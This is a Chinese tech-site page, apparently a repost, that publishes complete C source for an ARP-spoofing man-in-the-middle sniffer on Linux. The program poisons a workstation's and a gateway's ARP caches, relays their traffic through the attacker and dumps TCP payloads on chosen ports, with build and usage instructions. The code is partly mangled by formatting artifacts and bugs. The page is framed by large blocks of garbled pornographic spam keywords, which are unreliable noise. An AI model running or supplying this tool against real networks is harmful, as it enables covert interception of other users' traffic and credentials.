精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Arp Sniffer在linux下面的具體實現

安全 黑客攻防
arp sniffer源代碼,在紅帽9.0下編譯通過,不喜勿入。
/*============================================================================
Coder:  Paris-ye
Released on: 1/9/2003
Test on: redhat 9.0

Information:
This is a arp spoof sniffer.
W <--- workstation
B <--- Server or  GateWay
M <--- Man in the middle (agent),self IP address

Make:
first you must install "pcap" and "libnet"
gcc -I/usr/local/include -L/usr/local/lib -o sniffer sniffer.c -lpcap -lnet

Usage:
./sniffer -I [Interface] -M [Self IP] -W [Workstation IP] -S [Server IP] -P [port]
============================================================================*/

#include ;
#include ;
#include ;
#include ;
#include ;

#define  MAXBUF 1024*4
#define  PCAP_TOUT 5
#define  PROMISC 0
#define  TRUE 1
#define  FALSE 0

/* Ethernet protocol ID's */    
#define ETHERTYPE_PUP           0x0200          /* Xerox PUP */
#define ETHERTYPE_IP            0x0800          /* IP */
#define ETHERTYPE_ARP           0x0806          /* Address resolution */
#define ETHERTYPE_REVARP        0x8035          /* Reverse ARP */

/* This structure defines an ethernet arp header.  */

/* ARP protocol opcodes. */
#define ARPOP_REQUEST   1               /* ARP request.  */
#define ARPOP_REPLY     2               /* ARP reply.  */
#define ARPOP_RREQUEST  3               /* RARP request.  */
#define ARPOP_RREPLY    4               /* RARP reply.  */
#define ARPOP_InREQUEST 8               /* InARP request.  */
#define ARPOP_InREPLY   9               /* InARP reply.  */
#define ARPOP_NAK       10              /* (ATM)ARP NAK.  */

/* ARP protocol HARDWARE identifiers. */
#define ARPHRD_NETROM   0               /* From KA9Q: NET/ROM pseudo. */
#define ARPHRD_ETHER    1               /* Ethernet 10/100Mbps.  */
#define ARPHRD_EETHER   2               /* Experimental Ethernet.  */
#define ARPHRD_AX25     3               /* AX.25 Level 2.  */
#define ARPHRD_PRONET   4               /* PROnet token ring.  */
#define ARPHRD_CHAOS    5               /* Chaosnet.  */
#define ARPHRD_IEEE802  6               /* IEEE 802.2 Ethernet/TR/TB.  */
#define ARPHRD_ARCNET   7               /* ARCnet.  */
#define ARPHRD_APPLETLK 8               /* APPLEtalk.  */
#define ARPHRD_DLCI     15              /* Frame Relay DLCI.  */
#define ARPHRD_ATM      19              /* ATM.  */
#define ARPHRD_METRICOM 23              /* Metricom STRIP (new IANA id).  */

/* Dummy types for non ARP hardware */
#define ARPHRD_SLIP       0x256
#define ARPHRD_CSLIP      0x257
#define ARPHRD_SLIP6      0x258
#define ARPHRD_CSLIP6     0x259
#define ARPHRD_RSRVD      0x260             /* Notional KISS type.  */
#define ARPHRD_ADAPT      0x264
#define ARPHRD_ROSE       0x270 
#define ARPHRD_X25        0x271             /* CCITT X.25.  */
#define ARPHDR_HWX25      0x272             /* Boards with X.25 in firmware.  */
#define ARPHRD_PPP        0x512
#define ARPHRD_CISCO      0x513             /* Cisco HDLC.  */
#define ARPHRD_HDLC       ARPHRD_CISCO
#define ARPHRD_LAPB       0x516             /* LAPB.  */
#define ARPHRD_DDCMP      0x517             /* Digital's DDCMP.  */
#define ARPHRD_RAWHDLC    0x518             /* Raw HDLC.  */
    
#define ARPHRD_TUNNEL     0x768             /* IPIP tunnel.  */
#define ARPHRD_TUNNEL6    0x769             /* IPIP6 tunnel.  */
#define ARPHRD_FRAD       0x770             /* Frame Relay Access Device.  */
#define ARPHRD_SKIP       0x771             /* SKIP vif.  */
#define ARPHRD_LOOPBACK   0x772             /* Loopback device.  */
#define ARPHRD_LOCALTLK   0x773             /* Localtalk device.  */
#define ARPHRD_FDDI       0x774             /* Fiber Distributed Data Interface. */
#define ARPHRD_BIF        0x775             /* AP1000 BIF.  */ 
#define ARPHRD_SIT        0x776             /* sit0 device - IPv6-in-IPv4.  */
#define ARPHRD_IPDDP      0x777             /* IP-in-DDP tunnel.  */
#define ARPHRD_IPGRE      0x778             /* GRE over IP.  */
#define ARPHRD_PIMREG     0x779             /* PIMSM register interface.  */
#define ARPHRD_HIPPI      0x780             /* High Performance Parallel I'face. */
#define ARPHRD_ASH        0x781             /* (Nexus Electronics) Ash.  */
#define ARPHRD_ECONET     0x782             /* Acorn Econet.  */
#define ARPHRD_IRDA       0x783             /* Linux-IrDA.  */
#define ARPHRD_FCPP       0x784             /* Point to point fibrechanel.  */
#define ARPHRD_FCAL       0x785             /* Fibrechanel arbitrated loop.  */
#define ARPHRD_FCPL       0x786             /* Fibrechanel public loop.  */
#define ARPHRD_FCPFABRIC  0x787             /* Fibrechanel fabric.  */
#define ARPHRD_IEEE802_TR 0x800             /* Magic type ident for TR.  */
#define ARPHRD_IEEE80211  0x801             /* IEEE 802.11.  */

/* IP version number */
#define IPVERSION       4

struct ether_header
{
u_int8_t  ether_dhost[6];      /* destination eth addr */
u_int8_t  ether_shost[6];      /* source ether addr    */
u_int16_t ether_type;          /* packet type ID field */
};

struct arphdr
{
        unsigned short int ar_hrd;          /* Format of hardware address.  */
        unsigned short int ar_pro;          /* Format of protocol address.  */
        unsigned char ar_hln;               /* Length of hardware address.  */
        unsigned char ar_pln;               /* Length of protocol address.  */
        unsigned short int ar_op;           /* ARP opcode (command).  */
        unsigned char __ar_sha[6];          /* Sender hardware address.  */
        unsigned char __ar_sip[4];          /* Sender IP address.  */
        unsigned char __ar_tha[6];          /* Target hardware address.  */
        unsigned char __ar_tip[4];          /* Target IP address.  */
};

/*
 * Structure of an internet header, naked of options.
 */
struct iphead
{
unsigned int ip_hl:4;               /* header length */
unsigned int ip_v:4;                /* version */
u_int8_t ip_tos;                    /* type of service */
u_short ip_len;                     /* total length */
u_short ip_id;                      /* identification */
u_short ip_off;                     /* fragment offset field */
u_int8_t ip_ttl;                    /* time to live */
u_int8_t ip_p;                      /* protocol */
u_short ip_sum;                     /* checksum */
u_char ip_src[4], ip_dst[4];      /* source and dest address */
};

struct tcphead
  {
    u_int16_t th_sport;         /* source port */
    u_int16_t th_dport;         /* destination port */
    u_int32_t th_seq;             /* sequence number */
    u_int32_t th_ack;             /* acknowledgement number */
    u_int8_t th_off:4;          /* data offset */
    u_int8_t th_x2:4;           /* (unused) */
    u_int8_t th_flags;
#define TH_FIN        0x01
#define TH_SYN        0x02
#define TH_RST        0x04
#define TH_PUSH       0x08
#define TH_ACK        0x10
#define TH_URG        0x20
    u_int16_t th_win;           /* window */
    u_int16_t th_sum;           /* checksum */
    u_int16_t th_urp;           /* urgent pointer */
};

/*
 * W , S , M 's ip and mac address
 */
struct ipmacaddr
{
u_char ipW[4];
u_char macW[6];
u_char ipS[4];
u_char macS[6];
u_char ipM[4];
u_char macM[6];
};
int usage(char* argv)
{
printf("====================================\n");
printf("============Arp Sniffer=============\n");
printf("==========Write by Paris-Ye=========\n");
        printf("===Usage: %s -I [interface] -M [Self IP] -W [Workstation IP] -S [Server IP] -P [port]\n", argv);
printf("===For example:\n");
printf("\t%s -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254\n",argv);
        return 0;
}

/*send arp packet function*/
int arpsend(libnet_t* lnet,u_char* smac,u_char* sip,u_char* dmac,u_char* dip)
{
int ret=0;
u_char* packet;
u_long packets;
libnet_ptag_t t;
struct ether_header* ethh;
struct arphdr* arph;

packets=sizeof(struct ether_header)+sizeof(struct arphdr);
packet = malloc(packets);
ethh = (struct ether_header* ) packet;
arph = (struct arphdr* ) (packet+sizeof(struct ether_header));

memcpy(ethh->;ether_dhost,dmac,6);
memcpy(ethh->;ether_shost,smac,6);
ethh->;ether_type = htons(ETHERTYPE_ARP);
arph->;ar_hrd = htons(ARPOP_REQUEST);
arph->;ar_pro = htons(ARPHRD_IEEE802_TR);
arph->;ar_hln = 6;
arph->;ar_pln = 4;
arph->;ar_op = htons(ARPHRD_ETHER);
memcpy(arph->;__ar_sha,smac,6);
memcpy(arph->;__ar_sip,sip,4);
bzero(arph->;__ar_tha,6);
memcpy(arph->;__ar_tip,dip,4);
ret = libnet_write_link(
lnet,
packet,
packets
);
if(ret == -1)
{
return FALSE;
}
return TRUE;
}

/*Send spoof arp S And W every 6 second interval*/
void arpspoof(libnet_t* lnet,struct ipmacaddr* ipmac)
{
while(TRUE)
{
arpsend(lnet,ipmac->;macM,ipmac->;ipS,ipmac->;macW,ipmac->;ipW);
arpsend(lnet,ipmac->;macM,ipmac->;ipW,ipmac->;macS,ipmac->;ipS);
sleep(6);
}
}

/*Forward packets W--->;S or S--->;W*/
int forwarddate(libnet_t* lnet,const u_char* packet,int len,u_char* macW,u_char* macS,u_char* macM)
{
int ret=0;
const u_char* datapoint=packet;
struct ether_header* ethhdr;
struct iphead*       iph;

ethhdr = (struct ether_header*) datapoint;

if(ntohs(ethhdr->;ether_type)!=ETHERTYPE_IP)
return TRUE;
if(!memcmp(ethhdr->;ether_shost,macM,6)) /*if the Source Mac is agent(M)'s come back*/
return TRUE;
if(memcmp(ethhdr->;ether_dhost,macM,6)) /*if the Source Mac Destination is't agent(M)'s come back*/
return TRUE;
if(!memcmp(ethhdr->;ether_shost,macW,6)) /*if the Source Mac is W's(Workstation)*/
{
memcpy(ethhdr->;ether_shost,macM,6);
memcpy(ethhdr->;ether_dhost,macS,6);
ret = libnet_write_link(
lnet,
(u_char*)datapoint,
len
);
}
if(!memcmp(ethhdr->;ether_shost,macS,6)) /*if the Source Mac is S S's(server)*/
{
memcpy(ethhdr->;ether_shost,macM,6);
memcpy(ethhdr->;ether_dhost,macW,6);
ret = libnet_write_link(
lnet,
(u_char*)datapoint,
len
);
}

return TRUE;
}

/*print hex date to Ascii */
void printdat(u_char* packet,int len)
{
int i=0,j=0;
u_char str[16];
for(i=0;i<=len-16;i+=16)
{
memcpy(str,packet+i,16);
fprintf(stdout,"%02x%02x%02x%02x %02x%02x%02x%02x %02x%02x%02x%02x %02x%02x%02x%02x  ",
str[0],str[1],str[2],str[3],
str[4],str[5],str[6],str[7],
str[8],str[9],str[10],str[11],
str[12],str[13],str[14],str[15]
);
for(j=0;j<16;j++)
{
if(str[j] < 32 || str[j] >; 126)
str[j]='.';
}
fprintf(stdout,"%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c\n",
str[0],str[1],str[2],str[3],
str[4],str[5],str[6],str[7],
str[8],str[9],str[10],str[11],
str[12],str[13],str[14],str[15]
);
}
if(i!=len)
{
memcpy(str,packet+i,16);
for(j=0;j<16;j++)
{
if(j%4==0 && j!=0)
fprintf(stdout," ");
if((i+j){
fprintf(stdout,"%02x",str[j]);
}
else
fprintf(stdout,"  ");
}
fprintf(stdout,"  ");
for(j=0;j<16;j++)
{
if((i+j){
if(str[j] < 32 || str[j] >; 126)
str[j]='.';
fprintf(stdout,"%c",str[j]);
}
}
fprintf(stdout,"\n\n");
}
}

/*parse packet*/
int  parsedate(const u_char* packet,int len,u_char* macW,u_char* macS,u_char* macM,u_char* ipW,u_char* ipS,int* port)
{
int i=0;
int     contents;
u_char* content;
const u_char* datapoint=packet;
struct ether_header* ethhdr;
struct iphead*       iph;
struct tcphead*      tcph;

ethhdr = (struct ether_header*) datapoint;
iph = (struct iphead*) (datapoint+sizeof(struct ether_header));
tcph = (struct tcphead*) (datapoint+sizeof(struct ether_header)+sizeof(struct iphead));
if(memcmp(ethhdr->;ether_shost,macW,6) && memcmp(ethhdr->;ether_shost,macS,6))
return FALSE;
if(memcmp(ethhdr->;ether_dhost,macM,6))
return FALSE;
if(ntohs(ethhdr->;ether_type)!=ETHERTYPE_IP)
return FALSE;
if(iph->;ip_v != 4 || iph->;ip_hl != 5)
return FALSE;
if(!(!memcmp(iph->;ip_dst,ipW,4) || !memcmp(iph->;ip_src,ipW,4)))
return FALSE;
if(iph->;ip_p != IPPROTO_TCP)
return FALSE;
contents = htons(iph->;ip_len)-sizeof(struct iphead)-sizeof(struct tcphead);
content = (u_char *)(datapoint+sizeof(struct ether_header)+sizeof(struct iphead)+sizeof(struct tcphead));
if((tcph->;th_flags & TH_PUSH))
{
for(i==0;port!=0;i++)
{
printf("=====%d %d\n",port,htons(tcph->;th_dport));
if(port==htons(tcph->;th_dport) || port==htons(tcph->;th_sport))
break;
}
if(port==0)
return;
printf("Size:[%d] [%d.%d.%d.%d:%d]->;[%d.%d.%d.%d:%d]\n",htons(iph->;ip_len),
iph->;ip_src[0],iph->;ip_src[1],iph->;ip_src[2],iph->;ip_src[3],htons(tcph->;th_sport),
iph->;ip_dst[0],iph->;ip_dst[1],iph->;ip_dst[2],iph->;ip_dst[3],htons(tcph->;th_dport)
);
printdat(content,contents);
}

return TRUE;
}

/*Sniffer packets*/
int agentpacket(libnet_t* lnet,pcap_t* lpcap,struct ipmacaddr* ipmac,int* port)
{
const u_char* packet;
struct pcap_pkthdr hdr;
while(1)
{
packet=pcap_next(lpcap,&hdr);
if(packet==NULL || hdr.len==0)
continue;
parsedate(packet,hdr.len,ipmac->;macW,ipmac->;macS,ipmac->;macM,ipmac->;ipW,ipmac->;ipS,port);
forwarddate(lnet,packet,hdr.len,ipmac->;macW,ipmac->;macS,ipmac->;macM);
}

return TRUE;
}

/*
When initialize Get the S and W Mac address
Send arp request 
*/
int gettargetmac(libnet_t* lnet,struct ipmacaddr* ipmac)
{
while(1)
{
arpsend(lnet,ipmac->;macM,ipmac->;ipM,ipmac->;macW,ipmac->;ipW);
arpsend(lnet,ipmac->;macM,ipmac->;ipM,ipmac->;macS,ipmac->;ipS);
sleep(1);
}
return TRUE;
}

/*
When initialize Get the S and W Mac address
parse arp reply
*/
int getmacaddress(char* dev,libnet_t* lnet,pcap_t* lpcap,struct ipmacaddr* ipmac)
{
int skfd=0;
unsigned int isgetmac=0x0;
pid_t pid=0;
struct ifreq ifr;
const u_char* packet;
struct pcap_pkthdr hdr;
struct ether_header* ethhdr;
struct arphdr* arph;

//----------get local mac adrress
strcpy(ifr.ifr_name,dev);
skfd = socket(AF_INET,SOCK_DGRAM,0);
if(skfd<0)
{
printf("Can't open socket!\n");
return FALSE;
}
if(ioctl(skfd, SIOCGIFHWADDR, &ifr) < 0)
{
printf("Can't read local mac address!\n");
return FALSE;
}
memcpy(ipmac->;macM,ifr.ifr_hwaddr.sa_data,6);
close(skfd);
//----------get target mac address
pid = fork();
if(pid==0)
{
gettargetmac(lnet,ipmac);
exit(TRUE);
}
while(1)
{
packet=pcap_next(lpcap,&hdr);
if(packet==NULL || hdr.len==0)
continue;
ethhdr = (struct ether_header*) packet;
arph = (struct arphdr*) (packet+sizeof(struct ether_header));

if(memcmp(ethhdr->;ether_dhost,ipmac->;macM,6))
continue;
if(ntohs(ethhdr->;ether_type)!=ETHERTYPE_ARP)
continue;
if(!memcmp(arph->;__ar_sip,ipmac->;ipW,4) && !memcmp(arph->;__ar_tip,ipmac->;ipM,4))
{
memcpy(ipmac->;macW,arph->;__ar_sha,6);
isgetmac=0xFFFF0000 | isgetmac;
}
if(!memcmp(arph->;__ar_sip,ipmac->;ipS,4) && !memcmp(arph->;__ar_tip,ipmac->;ipM,4))
{
memcpy(ipmac->;macS,arph->;__ar_sha,6);
isgetmac=0x0000FFFF | isgetmac;
}
if(isgetmac == 0xFFFFFFFF)
break;
}
kill(pid,9);
return TRUE;
}

int main(int argc,char* argv[])
{
int          ret=0,i=0;
char  *p,*s;
char c;
char string[]="I:M:W:S:P:";
int port[100];
char dev[32]="";
struct ipmacaddr ipmac;
pid_t pid;
libnet_t* lnet;
pcap_t*     lpcap;
bpf_u_int32 netp,maskp;
struct bpf_program fp;
char        err[PCAP_ERRBUF_SIZE];
char        filterstr[]="";


unsigned int ipM;
unsigned int ipW;
unsigned int ipS;
u_char macW[] = {255,255,255,255,255,255,255};
u_char macS[] = {255,255,255,255,255,255,255};
u_char macM[] = {255,255,255,255,255,255,255};

bzero(&ipmac,sizeof(struct ipmacaddr));
if(argc<8)
{
usage(argv[0]);
return FALSE;
}
while((c = getopt(argc, argv, string)) != EOF)
{
switch(c)
{
case('I'):
strcpy(dev,optarg);
break;
case('M'):
ipM = inet_addr(optarg);
memcpy(ipmac.ipM,(void*)&ipM,4);
break;
case('W'):
ipW = inet_addr(optarg);
memcpy(ipmac.ipW,(void*)&ipW,4);
break;
case('S'):
ipS = inet_addr(optarg);
memcpy(ipmac.ipS,(void*)&ipS,4);
break;
case('P'):
printf("%s\n",optarg);
s = optarg;
       p=strtok(s,":");
         while(p)
         {
port=atoi(p);
           printf("%d\n",port);
           p=strtok(NULL,":");
i++;
        }
port=0;

break;
default:
usage(argv[0]);
return FALSE;
}
}

memcpy(ipmac.macW,macW,6);
memcpy(ipmac.macS,macS,6);
memcpy(ipmac.macM,macM,6);
ret = pcap_lookupnet(dev,&netp,&maskp,err);
if(ret == -1)
{
printf("Can't initialize PCAP![%s]\n",err);
return FALSE;
}
lpcap = pcap_open_live(
dev,
MAXBUF,
PROMISC,
PCAP_TOUT,
err
);
if(lpcap == NULL)
{
printf("Can't initialize PCAP![%s]\n",err);
return FALSE;
}

ret = pcap_compile(lpcap,&fp,filterstr,0,netp);
if(ret == -1)
{
printf("Error pcap_compile!\n");
return FALSE;
}

ret = pcap_setfilter(lpcap,&fp);
if(ret == -1)
{
printf("Error pcap_setfilter!\n");
return FALSE;
}

lnet = libnet_init(
LIBNET_LINK,
dev,
err);
if(lnet == NULL)
{
printf("Can't initialize libnet!Please check the [dev]\n");
return FALSE;
}

ret = getmacaddress(dev,lnet,lpcap,&ipmac);
printf("Get network cards mac address:\n");
printf("M->; %02x:%02x:%02x:%02x:%02x:%02x\n",ipmac.macM[0],ipmac.macM[1],ipmac.macM[2],ipmac.macM[3],ipmac.macM[4],ipmac.macM[5],ipmac.macM[6]);
printf("W->; %02x:%02x:%02x:%02x:%02x:%02x\n",ipmac.macW[0],ipmac.macW[1],ipmac.macW[2],ipmac.macW[3],ipmac.macW[4],ipmac.macW[5],ipmac.macW[6]);
printf("S->; %02x:%02x:%02x:%02x:%02x:%02x\n",ipmac.macS[0],ipmac.macS[1],ipmac.macS[2],ipmac.macS[3],ipmac.macS[4],ipmac.macS[5],ipmac.macS[6]);
printf("\nNow Start... .. .\n");
if(ret == FALSE)
{
return FALSE;
}

pid = fork();
if(pid==0)
{
arpspoof(lnet,&ipmac);
return FALSE;
}else
{
agentpacket(lnet,lpcap,&ipmac,port);
}

libnet_destroy(lnet);
pcap_close(lpcap);
printf("Done\n");
return TRUE;
}

責任編輯:王文文 來源: CHINAUNIX
相關推薦

2011-04-21 11:21:47

Linux路徑

2009-09-28 16:22:14

2009-07-15 21:35:39

2009-11-23 16:09:50

PHP實現偽靜態化頁面

2010-06-21 10:25:09

Linux APM

2009-08-12 17:12:51

C#讀取文件夾

2012-12-13 10:34:35

ARP欺騙

2010-06-13 15:20:20

Linux 查看內存

2010-06-11 17:12:53

Linux rsync

2010-06-21 17:32:36

2009-09-08 09:30:00

2010-06-21 17:51:53

Linux Arp命令

2010-06-11 17:04:45

php sendmai

2009-12-11 14:46:13

2010-06-21 17:10:02

Linux Arp命令

2010-06-13 15:08:05

Linux 查看網絡流

2013-04-07 13:47:12

2009-12-22 15:58:08

2011-07-20 12:01:13

2010-06-17 17:22:30

Cacti 監控Lin
點贊
收藏

51CTO技術棧公眾號

国产欧美一级片| 女人被狂躁c到高潮| 精品176二区| 国产大陆a不卡| 51精品国产黑色丝袜高跟鞋| 国产三级在线观看完整版| 国产一区二区三区免费观看在线| 亚洲一级二级三级| 日本一区视频在线| 精品国产亚洲一区二区麻豆| 亚洲女优在线| 久久在线免费观看视频| 五级黄高潮片90分钟视频| 91香蕉国产线在线观看| www.av导航| 久久久一二三| 国内精品久久久久| 香蕉成人在线视频| 天堂av一区二区三区在线播放| 欧美日韩国产bt| 国产一区二区网| v天堂福利视频在线观看| 国产日韩av一区| 国产日韩精品久久| 99精品国产99久久久久久97| 日韩精品乱码免费| 欧美又大又硬又粗bbbbb| 欧美高清视频一区二区三区| 热久久天天拍国产| 亚洲久久久久久久久久| 制服.丝袜.亚洲.中文.综合懂| 国产福利一区二区三区在线播放| 欧美视频在线看| 免费看黄在线看| 在线观看中文| 亚洲色图.com| 色之综合天天综合色天天棕色| 色视频在线观看| 成人动漫一区二区三区| 99久久久精品免费观看国产| 国产精品久久久久久久久久久久久久久久久久 | 国产精品一码二码三码在线| 91 中文字幕| 美女脱光内衣内裤视频久久网站 | 久久久午夜视频| 国产在线视频99| 亚洲视频精品| 高清欧美性猛交| 日本黄色片视频| 亚洲视频一二| 91国自产精品中文字幕亚洲| 日韩av男人天堂| 亚洲国产1区| 午夜伦理精品一区| 日韩少妇裸体做爰视频| 91久久亚洲| 91精品国产99| 日韩一区二区视频在线| 久久婷婷av| 国产精品久久久av| 综合久久中文字幕| 久久99热狠狠色一区二区| 国产日韩精品在线观看| 国产成人久久精品77777综合| 国产精品一二三四区| 成人在线观看91| 天天操天天干天天| 久久新电视剧免费观看| 午夜视频久久久| 日本三级视频在线观看| 亚洲欧美日韩系列| 成年人网站国产| 欧美大片免费观看网址| 欧美日韩日日摸| 中文字幕乱妇无码av在线| 东京久久高清| 亚洲深夜福利网站| 娇小11一12╳yⅹ╳毛片| 欧美一区亚洲| 国语自产偷拍精品视频偷| 日本一区二区三区精品| 男人的j进女人的j一区| 91网在线免费观看| 婷婷五月综合激情| 国产欧美精品一区二区三区四区| 中文字幕色一区二区| 欧洲一区二区三区| 91国产成人在线| 免费不卡av网站| 精品素人av| 中文字幕久久精品| 久久久精品人妻一区二区三区四| 欧美亚洲一区| 亚洲最大福利网| 奇米影视888狠狠狠777不卡| 中文字幕一区二| 国产美女网站在线观看| www一区二区三区| 日韩精品在线视频| 三级影片在线看| 久久久精品日韩| 亚洲综合中文字幕在线| 国产资源在线播放| 一个色在线综合| 污版视频在线观看| 欧美毛片免费观看| 日韩av中文在线观看| 国产亚洲精品高潮| 精品午夜福利在线观看| 美女视频黄a大片欧美| 国产九区一区在线| 久久久久久国产精品免费无遮挡| 精品欧美国产一区二区三区| 亚洲精品在线网址| 国内成人精品| 69久久夜色精品国产7777| 国产伦精品一区二区三区四区| 久久综合九色综合97婷婷女人| 毛片在线视频观看| 国产a亚洲精品| 亚洲偷欧美偷国内偷| 日本中文字幕免费观看| 国产一区二区三区在线观看精品| 天天人人精品| 欧美精品日日操| 亚洲国产精品久久久久| 永久免费看黄网站| 黑人精品欧美一区二区蜜桃| 欧美亚州在线观看| 色一区二区三区| 精品第一国产综合精品aⅴ| 中文字幕五月天| 久久国产精品一区二区| 日韩欧美在线电影| 肉色欧美久久久久久久免费看| 亚洲电影天堂av| 青娱乐国产盛宴| 国产一区二区调教| 欧洲xxxxx| 国产精品国产亚洲精品| www.日韩免费| 国产又黄又粗又长| 自拍偷拍亚洲欧美日韩| 做a视频在线观看| 国产精品国产一区| 国产日韩中文字幕在线| 日韩精品成人av| 欧美区一区二区三区| 天堂网av2018| 久久99精品久久久久久国产越南| 亚洲一区二区四区| 欧美一区=区三区| 日韩一区二区欧美| 99热在线只有精品| 一区二区三区在线视频观看58| 苍井空张开腿实干12次| 激情综合久久| 久久伊人资源站| 日本成人伦理电影| 中文字幕无线精品亚洲乱码一区 | 好吊色在线观看| 亚洲电影第三页| 7788色淫网站小说| 久久激情中文| 亚洲乱码国产乱码精品天美传媒| 国产精品美女午夜爽爽| 麻豆成人在线看| 成人小说亚洲一区二区三区| 精品国产鲁一鲁一区二区张丽| 亚洲第一黄色网址| 老司机精品久久| 一本色道久久99精品综合| 国产在线不卡一区二区三区| 欧美黄色成人网| 三级在线视频| 欧美喷水一区二区| 久久免费视频6| 久久久久亚洲蜜桃| 三级av免费看| 亚洲主播在线| 中文字幕欧美日韩一区二区| 成人av动漫| 国产精品久久久久久久久久久新郎| 男人影院在线观看| 亚洲国语精品自产拍在线观看| 成人午夜精品视频| 一区二区三区在线视频免费 | 国产1区在线观看| 色噜噜久久综合| 欧美三级日本三级| www一区二区| 天堂av.com| 日韩精品一二三四| 2021国产视频| 国产中文精品久高清在线不| 亚洲va欧美va国产综合剧情| 都市激情亚洲一区| 精品中文字幕在线| 国自产拍在线网站网址视频| 日韩欧美国产系列| 69av视频在线观看| 亚洲午夜免费视频| 三级黄色在线观看| 久久综合久久久久88| 日本高清免费在线视频| 爽爽淫人综合网网站| 99国产精品白浆在线观看免费| 日韩欧美国产精品综合嫩v| 国产亚洲欧美另类一区二区三区 | 国产一区在线观| 伊人久久大香伊蕉在人线观看热v| 第一社区sis001原创亚洲| 91成人国产在线观看| a级网站在线播放| 亚洲天堂2020| 五十路在线观看| 欧美一级片在线看| 中文字幕777| 日本韩国精品在线| 日本中文字幕网| 亚洲最新视频在线观看| 无码人妻丰满熟妇啪啪欧美| 久久久五月婷婷| 欧美深性狂猛ⅹxxx深喉| 国产成人在线看| 奇米影视四色在线| 日韩精品一级中文字幕精品视频免费观看| www.日本在线视频| 一区二区三区中文| 亚洲午夜精品一区二区三区| 国产精品亚洲片在线播放| 久99久视频| 国产精品久久久网站| 亚洲一区中文字幕| 精品国产一区二| 91在线免费网站| 91精品视频一区二区| 国产精品永久在线| 麻豆精品蜜桃| 国产精品久久久久久久久免费看 | 福利小视频在线| 欧美乱人伦中文字幕在线| 日本在线观看| 精品国产区一区二区三区在线观看| 二区在线视频| 中文字幕视频在线免费欧美日韩综合在线看 | av电影天堂一区二区在线观看| 可以看的av网址| 国产河南妇女毛片精品久久久| 在线观看免费视频污| 麻豆国产欧美日韩综合精品二区 | 国产高清不卡二三区| 少妇伦子伦精品无吗| 成人午夜免费视频| 污污污www精品国产网站| 成人动漫av在线| 人妻少妇精品视频一区二区三区| 成人av电影免费在线播放| 亚洲熟女一区二区| 久久久噜噜噜久噜久久综合| 久久精品成人av| 国产免费久久精品| 日韩精品一区二区三区在线视频| 亚洲品质自拍视频网站| 九九热精品免费视频| 午夜不卡在线视频| 久久免费激情视频| 色视频一区二区| 一级黄色大毛片| 精品久久久久一区二区国产| 亚洲av电影一区| 中文字幕精品av| 婷婷色在线播放| 久久久欧美精品| 精品国产第一福利网站| 国产精品永久免费观看| 99re8这里有精品热视频免费 | 亚洲欧美综合久久久| 国产精品久久国产| 亚洲一区日韩在线| 亚洲欧洲日本精品| 福利电影一区二区三区| japanese中文字幕| 亚洲免费在线看| 中文字幕精品无码一区二区| 欧美精品日日鲁夜夜添| 天堂网av2014| 久久九九亚洲综合| 国产资源在线观看入口av| 国产精品自产拍在线观| 成人精品毛片| 亚洲精品一区二区三区樱花| 亚洲午夜精品久久久久久app| 激情内射人妻1区2区3区| 九色porny丨国产精品| 国产极品一区二区| 自拍偷拍国产精品| 亚洲欧美综合自拍| 日韩欧美一级二级三级| 国产精品视频二区三区| 欧美激情一区二区三区成人| 春暖花开亚洲一区二区三区| 国产91亚洲精品一区二区三区| 成人在线免费观看91| 免费在线观看亚洲视频| 狠狠色丁香久久婷婷综合_中| 中文精品99久久国产香蕉| 天天操天天干天天操| 日韩在线观看av| 三级成人在线| 精品国产中文字幕| 国产一区视频在线观看免费| 欧美日韩中文不卡| 久久人人97超碰com| 久久久久99精品成人片毛片| 欧美日韩高清不卡| 精品资源在线看| 97免费中文视频在线观看| 精品国产亚洲一区二区三区在线 | 欧美久久一区二区| 巨骚激情综合| 91av在线不卡| 国产suv精品一区二区四区视频| 国产91av视频在线观看| 乱人伦精品视频在线观看| 亚洲天堂美女视频| 亚洲国产精品视频| 亚洲爆乳无码一区二区三区| 日韩有码片在线观看| 影音成人av| 日韩免费av电影| 老妇喷水一区二区三区| 国精产品一区一区三区免费视频| 亚洲电影一级黄| 手机看片国产1024| 性色av一区二区咪爱| av日韩精品| 鲁一鲁一鲁一鲁一色| 成人午夜私人影院| 国产精品第二十页| 亚洲成人久久电影| 爱啪啪综合导航| 久久伊人资源站| 噜噜噜在线观看免费视频日韩| 国产精品一区二区入口九绯色| 欧美视频第一页| 黄色av网站在线看| 国产精品999999| 天天操天天干天天操天天干| 亚洲最新视频在线观看| 亚洲乱码国产乱码精品精软件| 欧美肥婆姓交大片| 国产精品45p| 欧美日韩国产精品激情在线播放| 91在线精品一区二区| 精品成人久久久| 精品无人区乱码1区2区3区在线| 在线观看特色大片免费视频| 欧美在线一二三区| 日本91福利区| 久久福利免费视频| 日韩欧美www| 黄色在线网站噜噜噜| 欧洲精品在线一区| 久久66热re国产| 中文字幕在线观看成人| 亚洲国产精品女人久久久| 欧美大胆成人| 一区二区三区四区国产| 福利电影一区二区| 久久一区二区三区视频| 日韩亚洲在线观看| 在这里有精品| 不卡av免费在线| 亚洲三级在线观看| 天堂在线观看av| 国产成人一区二| 亚洲国产日韩欧美在线| 日本一卡二卡在线| 欧美色图12p| 超鹏97在线| 欧美一卡2卡3卡4卡无卡免费观看水多多| 日本一区中文字幕 | 91欧美在线| 日本一区二区免费视频| 色婷婷狠狠综合| av大大超碰在线| 欧美激情专区| 国产精品一区二区x88av| 国产精品久免费的黄网站| 精品国产欧美成人夜夜嗨| 欧美aaaaaaaa牛牛影院| 亚洲免费av一区| 欧美日韩国产中文字幕| 成人免费网址| 日韩高清av电影| 成人va在线观看| 国产又粗又猛又黄又爽无遮挡| 亚洲**2019国产| 一区二区三区网站|